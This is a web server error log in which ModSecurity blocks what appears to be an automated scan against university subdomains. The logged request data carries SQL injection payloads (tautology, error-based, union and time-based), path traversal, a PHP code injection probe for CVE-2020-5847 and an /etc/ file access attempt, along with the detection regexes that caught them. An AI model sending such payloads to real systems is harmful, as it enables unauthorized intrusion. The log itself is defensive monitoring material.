[Tue Aug 29 11:30:37.646710 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAOM4XcAAAAU"]
[Tue Aug 29 11:30:37.648623 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPyODsAAAAR"]
[Tue Aug 29 11:30:37.651172 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAO8760AAAAF"]
[Tue Aug 29 11:30:37.663277 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPMmBMAAAAY"]
[Tue Aug 29 11:30:38.348008 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bsCo-f0AAAPiBhQAAAAB"]
[Tue Aug 29 11:30:38.364205 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bsCo-f0AAAPENeoAAAAQ"]
[Tue Aug 29 11:30:38.366672 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bsCo-f0AAAPyOD4AAAAR"]
[Tue Aug 29 11:30:38.387669 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bsCo-f0AAAPpWdwAAAAI"]
[Tue Aug 29 11:30:39.333081 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPENewAAAAQ"]
[Tue Aug 29 11:30:39.335800 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPENewAAAAQ"]
[Tue Aug 29 11:30:39.375769 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10b8Co-f0AAAOM4XkAAAAU"]
[Tue Aug 29 11:30:39.403470 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAO8768AAAAF"]
[Tue Aug 29 11:30:39.405310 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAO8768AAAAF"]
[Tue Aug 29 11:30:39.434038 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOM4XsAAAAU"]
[Tue Aug 29 11:30:39.440563 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPENe8AAAAQ"]
[Tue Aug 29 11:30:39.459684 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPXAnoAAAAi"]
[Tue Aug 29 11:30:39.488735 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPiBhkAAAAB"]
[Tue Aug 29 11:30:39.490943 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPiBhkAAAAB"]
[Tue Aug 29 11:30:39.561558 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOH4VEAAAAH"]
[Tue Aug 29 11:30:39.565041 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPXAn8AAAAi"]
[Tue Aug 29 11:30:40.618566 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10cMCo-f0AAAOOuXUAAAAW"]
[Tue Aug 29 11:30:41.832342 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPXAosAAAAi"]
[Tue Aug 29 11:30:41.868646 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAP05E8AAAAA"]
[Tue Aug 29 11:30:41.880207 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPXAo0AAAAi"]
[Tue Aug 29 11:30:41.884842 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAOOuYAAAAAW"]
[Tue Aug 29 11:30:42.329362 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPiBhwAAAAB"]
[Tue Aug 29 11:30:42.468123 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPXAo8AAAAi"]
[Tue Aug 29 11:30:42.534041 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPDnzsAAAAP"]
[Tue Aug 29 11:30:42.583468 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPv-GQAAAAM"]
[Tue Aug 29 11:30:42.592248 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOKNpYAAAAK"]
[Tue Aug 29 11:30:42.607137 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOOuYYAAAAW"]
[Tue Aug 29 11:30:42.620260 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOH4VsAAAAH"]
[Tue Aug 29 11:30:43.304420 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPyOFQAAAAR"]
